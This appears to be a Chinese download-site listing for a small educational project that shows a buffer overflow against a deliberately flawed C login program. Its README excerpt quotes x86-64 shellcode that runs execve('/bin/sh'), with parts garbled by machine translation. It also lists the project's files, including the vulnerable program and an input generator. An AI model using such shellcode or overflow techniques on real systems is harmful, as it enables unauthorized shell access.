Buffer-Overflow:一个简单的缓冲区溢出攻击来破解一个用 C 编写的天真的错误登录程序的简单说明

时间:2021-07-01 14:26:57
【文件属性】:
文件名称:Buffer-Overflow:一个简单的缓冲区溢出攻击来破解一个用 C 编写的天真的错误登录程序的简单说明
文件大小:4KB
文件格式:ZIP
更新时间:2021-07-01 14:26:57
C 缓冲区溢出 缓冲区溢出攻击的简单说明,用于破解一个用 C 编写的幼稚的错误登录程序,并使用 shell 代码生成一个交互式 shell。 攻击方法 下面一段汇编代码用作shellcode: Needle0: jmp here: pop %rdi xor %rax, %rax movb $0x3b, %al xor %rsi, %rsi xor %rdx, %rdx 系统调用那里: call here .string "/bin/sh"needle1: .octa 0x死牛肉 在上面的汇编代码中,字符串“/bin/sh”放在调用之后,以便在调用后将其压入堆栈。 然后将其弹出到 rdi 上。 经过一些工作,最终调用中断,并使用“execv”系统调用或“0x3b 系统调用号”将外壳加载到内存中。 参考: : 这个 shell 代码的对象转储被获取并在程序中适当地溢出,如下所述。 缓冲
【文件预览】:
Buffer-Overflow-master
----badbuf_dummy.c(615B)
----shinit.c(102B)
----generate_input.py(602B)
----README.md(3KB)
----shell.c(306B)
----makefile(298B)
----exec_shell.s(559B)
----badbuf.c(576B)

网友评论